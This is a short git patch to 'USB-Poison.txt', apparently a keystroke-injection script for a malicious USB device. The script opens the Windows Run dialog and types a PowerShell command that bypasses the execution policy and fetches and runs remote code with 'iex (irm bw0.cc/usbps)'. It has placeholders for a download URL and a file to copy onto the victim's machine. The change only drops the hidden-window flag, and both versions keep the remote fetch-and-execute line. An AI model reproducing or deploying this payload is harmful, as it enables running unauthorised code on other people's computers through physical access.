From c998698d9cd9cb87c508cefa2c92dfb81f043295 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 11:06:20 +0000 Subject: [PATCH] Update USB-Poison.txt --- USB-Poison/USB-Poison.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/USB-Poison/USB-Poison.txt b/USB-Poison/USB-Poison.txt index 78e71f3..b7e5c88 100644 --- a/USB-Poison/USB-Poison.txt +++ b/USB-Poison/USB-Poison.txt @@ -11,6 +11,6 @@ REM open powershell (remove "-W H" to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' ; iex (irm bw0.cc/usbps) +STRING powershell -Ep Bypass -C $DLurl = 'YOUR_FILE_URL_HERE'; $File = 'NAME_OF_FILE_TO_COPY' ; iex (irm bw0.cc/usbps) ENTER